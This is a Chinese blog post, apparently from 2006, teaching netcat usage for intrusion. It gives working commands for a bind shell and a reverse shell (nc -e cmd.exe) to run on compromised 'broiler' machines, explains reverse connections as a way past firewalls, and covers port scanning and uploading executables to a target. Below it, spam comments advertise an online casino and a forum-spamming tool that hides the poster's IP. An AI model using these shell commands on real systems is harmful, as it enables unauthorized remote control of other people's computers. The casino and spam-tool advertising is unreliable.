导航

« 入侵技巧(1) nc使用详细教程 »

nc使用教程(含动画)

命令1:监听命令
nc -l -p port
nc -l -p port > e:\log.dat
nc -l -v -p port

参数解释:

-l:监听端口,监听入站信息
-p:后跟本地端口号
-v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息

提示:一般大家都爱用-vv

nc -l -p 80

这个很简单,监听80端口
如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦!

nc -l -p 80 > e:\log.dat

呵呵,功能和上边一样,但是后边加了个“> e:\log.dat”我想,学过ECHO
那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件

nc -l -v -p 80

和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC
的屏幕上。


呵呵,讲了这么多,来实践下

nc -l -v -p 80

然后在浏览器中输入本机IP:127.0.0.1
呵呵,看到什么?


同样,上边两个也是一样,大家自己试验一下吧


命令2:程序定向

nc -l -p port -t -e cmd.exe

本地机: nc -l -p port 或 nc -l -v -p port

目标机:nc -e cmd.exe ip port

参数解释:

-l、-p两个参数已经解释过了

-e;作用就是程序定向
-t:以telnet的形式来应答

例子

nc -l -p 5277 -t -e cmd.exe

知道运行在哪里吗?千万不要运行在自己的机器上,如果运行了,你机器
就会变成一台TELNET的服务器了,呵呵,解释一下:监听本地端口5277的
入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。

说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。。(话外音:说这么多遍当我们白痴啊,快往下讲!!!)

呵呵,咱们来找台肉鸡试试,我TELNET IP 5277
HOHO~~如何?


local machine:nc -l -p port ( or nc -l -v -p port )
remote machine:nc -e cmd.exe ip port

大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,
什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说
不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你
这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。


这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么?
咳!!听我给你讲啊!!(先交100000000RMB学费)哇,别杀我啊!!)

nc -l -p 5277 (坚听本地5277端口)

同样也可以用

nc -l -v -p 5277

运行在本地

然后在远程机器上,想办法运行

nc -e cmd.exe ip 5277

(你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样!!

呵呵,看看在本地机器上出现了什么?

这样就是反弹~~在本地机器上得到了一个SHELL


命令3:扫描端口

nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port


参数解释:

-z:将输入输出关掉,在扫描时使用

nc -v ip port

这个命令是针对某一个端口进行扫描

例如:

nc -v ip 135

扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息

例如:80端口

我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息


nc -v -z ip port-port

这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围

例如:

nc -v -z ip 1-200

可以看到我机器上的1-200的TCP端口的开放情况


nc -v -z -u ip port-port

这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP端口的

例如:

nc -v -z -u ip 1-200

这个命令就会扫1-200的UDP端口


命令4:传送文件(HOHO,I LIKE)

LOCAL MACHINE:nc -v -n ip port < x:\svr.exe
REMOTE MACHINE:nc -v -l -p port > y:\svr.exe

参数解释:

-n:指定数字的IP地址

这两个命令结合起来是用来传送文件的

首先,在远程机上运行命令:

nc -v -l -p 5277 > c:\pulist.exe

这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口

并把接受到的信息数据写到c:\pulist.exe中


这时候在本地机上运行

nc -v -n ip 5277 < e:\hack\pulist.exe

这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上

这样远程主机就会自动创建一个pulist.exe文件。。呵呵,你想到了吗??


上边是NC的比较常用的方法,希望通过这些,大家能发挥自己的想象力,创造出更多更精彩的命令来,
因为NC的用法不仅仅局限于这几种而已哦!!对NC来说,只有想不到,没有做不到的!!!


啊,200多行字啊!!加上动画好累啊。。。

希望大家能学会,不要辜负我这么累啊!!

结束

by 暝暝

下载动画:nc使用动画
  • quote 1.ahui
  • 顶啊 多发些这类的东西
    这么好的教程
  • 2006-11-9 16:48:34 回复该留言
  • quote 4.百家乐
  • http://www.669suncity.com
  • 太阳城百家乐.百家乐开户.真人百家乐.菲律宾太阳城.菲律宾太阳城百家乐.菲律宾真人百家乐.在线百家乐.真人百家乐.网络百家乐.在线百家乐.百家乐论坛网.百家乐代理.澳门百家乐现场.澳门百家乐经验.百家乐玩法.澳门百家乐经验.百家乐规则.太阳城.太阳城.在线百家乐太阳城.太阳城百家乐经验.太阳城百家乐玩法.12
  • 2008-9-16 0:54:04 回复该留言
  • quote 5.真人百家乐
  • http://www.669suncity.com
  • 菲律宾太阳城真人娱乐场,真人荷官发牌,娱乐与公证性并存,提供在线免费开户,自助提款,太阳城真人百家乐,斗地主,德州扑克,麻雀牌九,龙虎,大小,梭哈,三公...网站:Http://www.669suncity.com...24小时客服热线:13711111856免费热线:4006866092QQ:338086312
  • 2008-9-16 10:04:57 回复该留言
  • quote 6.太阳城suncity
  • http://www.669suncity.com
  • 菲律宾太阳城真人娱乐场,真人荷官发牌,娱乐与公证性并存,提供在线免费开户,自助提款,太阳城真人百家乐,斗地主,德州扑克,麻雀牌九,龙虎,大小,梭哈,三公.太阳城suncity..网站:Http://www.669suncity.com...客服QQ:338086312
  • 2008-9-16 17:02:01 回复该留言
  • quote 7.极速论坛营销王
  • http://www.jsyx2008.cn
  • 极速论坛营销王完美支持Dvbbs、PHPWind、Discuz三大主流论坛。超高成功率注册发帖,支持全自动模式和手动辅助识别验证码模式,大中小型论坛通杀。国内首创注册智能问答系统,大幅度提高了对新版本论坛的注册成功率。首创线程分布模型,将线程分为三段同步注册、智能答题、发帖,有效体提高软件运行的稳定性和发帖成功率。完善的虚拟IP技术确保隐藏您真实的IP地址,确保不被论坛管理员知道你的真是IP而封杀掉。强大的多线程蜘蛛搜索功能让你每日轻松搜索15万个以上的新鲜论坛数据。成熟的论坛地址PR算法,使你100准确的得到每个论坛的PR值。了解更多请访问:http://www.jsyx2008.cn12
  • 2008-9-19 18:46:36 回复该留言

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

日历

最新评论及回复

最近发表

Powered By SunK

Copyright 2005-2006 sunk.cn 蜀ICP备06007105号